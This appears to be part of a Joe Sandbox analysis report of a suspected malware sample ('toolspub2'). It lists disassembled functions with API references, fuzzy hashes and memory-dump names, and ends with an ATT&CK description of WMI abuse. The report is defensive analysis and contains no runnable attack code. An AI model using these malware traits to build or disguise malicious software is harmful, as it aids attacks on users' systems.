Part of subcall function 004096BB: __amsg_exit.LIBCMT ref: 004096CB

__calloc_crt.LIBCMT ref: 0040CA4C

Part of subcall function 0040D908: __calloc_impl.LIBCMT ref: 0040D919
Part of subcall function 0040D908: Sleep.KERNEL32(00000000,00403031,00401178), ref: 0040D930

__lock.LIBCMT ref: 0040CA82
___addlocaleref.LIBCMT ref: 0040CA8E
__lock.LIBCMT ref: 0040CAA2
InterlockedIncrement.KERNEL32(?), ref: 0040CAB2

Part of subcall function 0040302C: __getptd_noexit.LIBCMT ref: 0040302C

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl__getptd
String ID:
API String ID: 3538106438-0
Opcode ID: a3d108fcb34944dd1e9b9f510193ace4fb2c2dd4c40d3c2467ad952dd5ef8e04
Instruction ID: da71f5917c855904b075a81e26c4bf3287fe5a24af0304b884577232cf1d0e4a
Opcode Fuzzy Hash: a3d108fcb34944dd1e9b9f510193ace4fb2c2dd4c40d3c2467ad952dd5ef8e04
Instruction Fuzzy Hash: FF019272651705EBE720BFB59842B0C76A0AF44724F20823FF454B62C2CB7C59418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00426870 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

CreateJobObjectA.KERNEL32(00000000,Bezematevaneri fedilovewe), ref: 0042688D
CreateJobObjectA.KERNEL32(00000000,Gosituya), ref: 00426896
QueryPerformanceCounter.KERNEL32(?,?,51486D3F,75AA5290,00000000), ref: 004268B2

Strings

Bezematevaneri fedilovewe, xrefs: 00426886
Gosituya, xrefs: 0042688F

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: CreateObject$CounterPerformanceQuery
String ID: Bezematevaneri fedilovewe$Gosituya
API String ID: 1363187892-3668156984
Opcode ID: 06006313204ec8dd19d6c99a55f0b51c43bd977f632fb5f021cc61e70dd19504
Instruction ID: b6313131a10b4109e4bca011972a5a9c615bdee5130d6e747473c0031fd100c5
Opcode Fuzzy Hash: 06006313204ec8dd19d6c99a55f0b51c43bd977f632fb5f021cc61e70dd19504
Instruction Fuzzy Hash: 89E0DF70644221E7D230EF94FC12B8A3BA0E714720F80953AE54053291D378A408CF6E

Uniqueness

Uniqueness Score: -1.00%

Function 004141EE Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,?,00431A90,0000000C), ref: 00414222
GetLastError.KERNEL32(?,?,00431A90,0000000C), ref: 0041422C
__dosmaperr.LIBCMT ref: 00414233
__alloc_osfhnd.LIBCMT ref: 00414254
__set_osfhnd.LIBCMT ref: 0041427E

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
String ID:
API String ID: 43408053-0
Opcode ID: b28c08a3f87696fff16d1f3be59f3bacc19dad44c775c40ed7b339fc48774f3e
Instruction ID: f252d0e1964a60eddc61cd80a103c1c8db25d6759f766fdab1d458e6e18f68df
Opcode Fuzzy Hash: b28c08a3f87696fff16d1f3be59f3bacc19dad44c775c40ed7b339fc48774f3e
Instruction Fuzzy Hash: 7C213B315412059ADB119F66C8057D97F60AF863A4F58829AF4644F2D2C73C86C6DF49

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA2A Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0040C981

Part of subcall function 00409DCD: __mtinitlocknum.LIBCMT ref: 00409DE3
Part of subcall function 00409DCD: __amsg_exit.LIBCMT ref: 00409DEF
Part of subcall function 00409DCD: EnterCriticalSection.KERNEL32(00403022,00403022,?,00403635,00000004,00431608,0000000C,0040D91E,00401178,00403031,00000000,00000000,00000000,?,0040966D,00000001), ref: 00409DF7

InterlockedDecrement.KERNEL32(00000000), ref: 0040C993

Part of subcall function 0040D7FA: __lock.LIBCMT ref: 0040D818
Part of subcall function 0040D7FA: ___sbh_find_block.LIBCMT ref: 0040D823
Part of subcall function 0040D7FA: ___sbh_free_block.LIBCMT ref: 0040D832
Part of subcall function 0040D7FA: HeapFree.KERNEL32(00000000,00401178,00431900,0000000C,00409DAE,00000000,00431698,0000000C,00409DE8,00401178,00403022,?,00403635,00000004,00431608,0000000C), ref: 0040D862
Part of subcall function 0040D7FA: GetLastError.KERNEL32(?,00403635,00000004,00431608,0000000C,0040D91E,00401178,00403031,00000000,00000000,00000000,?,0040966D,00000001,00000214), ref: 0040D873

__lock.LIBCMT ref: 0040C9C1
___removelocaleref.LIBCMT ref: 0040C9D0
___freetlocinfo.LIBCMT ref: 0040C9E9

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: __lock$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref___sbh_find_block___sbh_free_block__amsg_exit__mtinitlocknum
String ID:
API String ID: 1907232653-0
Opcode ID: 5dfafbe976f8ab1a2d419da73193d83187e42ab0d07a107b919a13007f9f12f3
Instruction ID: a8337abdac5638ab8b2ce02d9d10e8eea47d6caa850ebd85332dbc4f8bf1f944
Opcode Fuzzy Hash: 5dfafbe976f8ab1a2d419da73193d83187e42ab0d07a107b919a13007f9f12f3
Instruction Fuzzy Hash: F5118F71641204EAD734AFA9D886B1A77E49F00755F60463FF494B72C1CB3C9D409A5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__decode_pointer.LIBCMT ref: 0040EEB2

Part of subcall function 00409432: TlsGetValue.KERNEL32(00000000,?,004094ED,?,00409659,?,?,00403031,00401178), ref: 00409444
Part of subcall function 00409432: TlsGetValue.KERNEL32(00000005,?,004094ED,?,00409659,?,?,00403031,00401178), ref: 0040945B

__decode_pointer.LIBCMT ref: 0040EEE6

Part of subcall function 00409432: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004094ED,?,00409659,?,?,00403031,00401178), ref: 00409471
Part of subcall function 00409432: __crt_waiting_on_module_handle.LIBCMT ref: 0040947C
Part of subcall function 00409432: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040948C

__decode_pointer.LIBCMT ref: 0040EF10

Strings

g, xrefs: 0040EEF0

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: __decode_pointer$Value$AddressHandleModuleProc__crt_waiting_on_module_handle
String ID: g
API String ID: 3699705733-30677878
Opcode ID: b6c64bd4ec9cb8d38f60739acd44ae8dfe7ed742478320f1c5c1da057648d2da
Instruction ID: 8cb90c2b2858fad956ce47c50450e7827b016897c0adf0edc70277afadb4ff9a
Opcode Fuzzy Hash: b6c64bd4ec9cb8d38f60739acd44ae8dfe7ed742478320f1c5c1da057648d2da
Instruction Fuzzy Hash: 11212E7688612CAEDF35DF54DC49AD9BBB5EB14310F2084E6E408B22A1D7394FA1DF14

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE5D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

__decode_pointer.LIBCMT ref: 0040EEB2

Part of subcall function 00409432: TlsGetValue.KERNEL32(00000000,?,004094ED,?,00409659,?,?,00403031,00401178), ref: 00409444
Part of subcall function 00409432: TlsGetValue.KERNEL32(00000005,?,004094ED,?,00409659,?,?,00403031,00401178), ref: 0040945B

__decode_pointer.LIBCMT ref: 0040EEE6

Part of subcall function 00409432: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004094ED,?,00409659,?,?,00403031,00401178), ref: 00409471
Part of subcall function 00409432: __crt_waiting_on_module_handle.LIBCMT ref: 0040947C
Part of subcall function 00409432: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040948C

__decode_pointer.LIBCMT ref: 0040EF10

Strings

g, xrefs: 0040EEF0

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: __decode_pointer$Value$AddressHandleModuleProc__crt_waiting_on_module_handle
String ID: g
API String ID: 3699705733-30677878
Opcode ID: 8890272e463b88a328a9ab7d65893a8d17496181a91866a32a88404b1eec83e6
Instruction ID: e3e552b970355f420e7484aa75f1336868f9f5c040cb1bd06a8fb46a4655f9fb
Opcode Fuzzy Hash: 8890272e463b88a328a9ab7d65893a8d17496181a91866a32a88404b1eec83e6
Instruction Fuzzy Hash: 91212E7684612CAEDF35DB54DC49AD8BBB5EB14310F2084E6E408B21A1CB359F91DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00427CDC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00426FB1), ref: 00427CE1
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00427CF1

Strings

IsProcessorFeaturePresent, xrefs: 00427CEB
KERNEL32, xrefs: 00427CDC

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: f9f5646c9199d1fdface2600a80a4aad261b597abefd70ee8b2bab88f68309b4
Instruction ID: 532d90e959b139bf26afad07675cf8fd5cd8b7bd6ac19558000eb9725715b648
Opcode Fuzzy Hash: f9f5646c9199d1fdface2600a80a4aad261b597abefd70ee8b2bab88f68309b4
Instruction Fuzzy Hash: 86F03030B04A19E2EF001BB2BC0A3AF7A78FB84B46FE155A1D592E0194DF348075925E

Uniqueness

Uniqueness Score: -1.00%

Function 00412160 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00412194
__isleadbyte_l.LIBCMT ref: 004121C8
MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000000,?,?,00000000), ref: 004121F9
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000000,?,?,00000000), ref: 00412267

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: cd86d75d1979232ed7ae86e00e9b92b5895599afbf1884a3216875cc5b1846c4
Instruction ID: bdc0bca2ba9d4a50ece3ce278e0e8806af0dd24f06a6ee8b409e92efed942d53
Opcode Fuzzy Hash: cd86d75d1979232ed7ae86e00e9b92b5895599afbf1884a3216875cc5b1846c4
Instruction Fuzzy Hash: 0031D131A00246FFDB20DFA4CD80AEF3BB1BF01310B1585AAE561DB291D374C9A1DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00427BC8 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00427BEE

Part of subcall function 004279D6: __fltout2.LIBCMT ref: 00427A02

__cftog_l.LIBCMT ref: 00427C14
__cftoe_l.LIBCMT ref: 00427C46

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: afc8384d7de5dc81d749eb2ef2e502e72940c946d5071aaa17129bf9d5fb4602
Instruction ID: 9556d4cb430898edcd17b22756e5563462b307767c13da47141d2af8c2e186ab
Opcode Fuzzy Hash: afc8384d7de5dc81d749eb2ef2e502e72940c946d5071aaa17129bf9d5fb4602
Instruction Fuzzy Hash: 5311953214415EBBCF125F95EC11CEE3F26BF18354B988416FE1855131C33ACAB1AB89

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1CF Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 0041A1DD

Part of subcall function 00409C00: __set_error_mode.LIBCMT ref: 00409C02
Part of subcall function 00409C00: __set_error_mode.LIBCMT ref: 00409C0F
Part of subcall function 00409C00: __NMSG_WRITE.LIBCMT ref: 00409C27
Part of subcall function 00409C00: __NMSG_WRITE.LIBCMT ref: 00409C31

__NMSG_WRITE.LIBCMT ref: 0041A1E4

Part of subcall function 00409A2F: __set_error_mode.LIBCMT ref: 00409A60
Part of subcall function 00409A2F: __set_error_mode.LIBCMT ref: 00409A71
Part of subcall function 00409A2F: _strcpy_s.LIBCMT ref: 00409AA5
Part of subcall function 00409A2F: __invoke_watson.LIBCMT ref: 00409AB6
Part of subcall function 00409A2F: GetModuleFileNameA.KERNEL32(00000000,00435699,00000104,00403031,00401178), ref: 00409AD2
Part of subcall function 00409A2F: _strcpy_s.LIBCMT ref: 00409AE7
Part of subcall function 00409A2F: __invoke_watson.LIBCMT ref: 00409AFA
Part of subcall function 00409A2F: _strlen.LIBCMT ref: 00409B03
Part of subcall function 00409A2F: _strlen.LIBCMT ref: 00409B10
Part of subcall function 00409A2F: __invoke_watson.LIBCMT ref: 00409B3D

Part of subcall function 00401A51: ___crtCorExitProcess.LIBCMT ref: 00401A59
Part of subcall function 00401A51: ExitProcess.KERNEL32 ref: 00401A62

HeapAlloc.KERNEL32(00000000,?), ref: 0041A210
HeapAlloc.KERNEL32(00000000,?), ref: 0041A240

Part of subcall function 0041A180: __lock.LIBCMT ref: 0041A19D
Part of subcall function 0041A180: ___sbh_alloc_block.LIBCMT ref: 0041A1A8

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: __set_error_mode$__invoke_watson$AllocExitHeapProcess_strcpy_s_strlen$FileModuleName___crt___sbh_alloc_block__lock
String ID:
API String ID: 913549098-0
Opcode ID: bd7f98664f1606914fa7667bba07b3a0040597b8bfed7f17702e075276170e97
Instruction ID: 960f41cfa17595f83c6d9551225e6ee0fca6855a1ecdb811f12af8bb98e34ab9
Opcode Fuzzy Hash: bd7f98664f1606914fa7667bba07b3a0040597b8bfed7f17702e075276170e97
Instruction Fuzzy Hash: BFF02D316425157ADA205754FD06BEA3798DB04334F604136FC08EA2D1C7759CD0459E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B290 Relevance: 6.0, APIs: 4, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?), ref: 0040B2BE
HeapFree.KERNEL32(00000000,?), ref: 0040B2CE
HeapFree.KERNEL32(00000000), ref: 0040B2EB
HeapDestroy.KERNEL32 ref: 0040B2F5

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: FreeHeap$DestroyVirtual
String ID:
API String ID: 765507482-0
Opcode ID: 4319b5f5d82f1e992a773e3f3ddcd6dc63844c8bb92395f6eaa5d880ad44550a
Instruction ID: 008255dce43248b1849ddd75b5874f7eb21759bdd295429c83a154c1cb226d01
Opcode Fuzzy Hash: 4319b5f5d82f1e992a773e3f3ddcd6dc63844c8bb92395f6eaa5d880ad44550a
Instruction Fuzzy Hash: 09F0A472200A04EBEB210F18EC9AB093B70EB44324FA22075FA80A60B0C3762C20DF5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C835 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0040C841

Part of subcall function 004096BB: __getptd_noexit.LIBCMT ref: 004096BE
Part of subcall function 004096BB: __amsg_exit.LIBCMT ref: 004096CB

__getptd.LIBCMT ref: 0040C858
__amsg_exit.LIBCMT ref: 0040C866
__lock.LIBCMT ref: 0040C876

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 95c2aacba9edb6b2129cce7f34204d8a9cda861881e51d0b215f151b5da9f43a
Instruction ID: ce53e5ddcb8f924043b5141b2c9a3c1c186cd418a65e08e7cf8026f1bb8df701
Opcode Fuzzy Hash: 95c2aacba9edb6b2129cce7f34204d8a9cda861881e51d0b215f151b5da9f43a
Instruction Fuzzy Hash: 35F06D33990600DAD720BBBA8842B4972A0AB0072AF10877FE441B72D2DB3C9941DE9D

Uniqueness

Uniqueness Score: -1.00%

Function 004133BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004133CE

Part of subcall function 004021DE: __getptd.LIBCMT ref: 004021F1

__iswctype_l.LIBCMT ref: 00413439

Strings

$, xrefs: 0041341B

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: Locale$UpdateUpdate::___getptd__iswctype_l
String ID: $
API String ID: 2516049255-3993045852
Opcode ID: 006087988fbc537177258644fa8f30ba6b5ec660bbca4887f4f0afb15fda0366
Instruction ID: 1b3d1f56fb7e1f4cfa214c06ba5a4d6c24a9738cd0a0972a3d65fd9d05bc3e3a
Opcode Fuzzy Hash: 006087988fbc537177258644fa8f30ba6b5ec660bbca4887f4f0afb15fda0366
Instruction Fuzzy Hash: FA61A07180021AEADF31DF59C5457EF7BA1AF0176AF24016BE8A166280D3388FD6879D

Uniqueness

Uniqueness Score: -1.00%

Function 004036D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 004036FA
__calloc_crt.LIBCMT ref: 00403713

Strings

wC, xrefs: 0040372A

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: __calloc_crt
String ID: wC
API String ID: 3494438863-1805282183
Opcode ID: 59a20ed8717772c17a95aab54d27aced332b73b16ad183781151c7feca20f34b
Instruction ID: 3ea0b725ef42adc448c1ff88e0037ec2b88b90cfdfc201c7d13b99c551fbc34e
Opcode Fuzzy Hash: 59a20ed8717772c17a95aab54d27aced332b73b16ad183781151c7feca20f34b
Instruction Fuzzy Hash: 1911E3F13086116BE7288E1DBC916666E89E75876AB24913FF101EB3D4E738D941464C

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
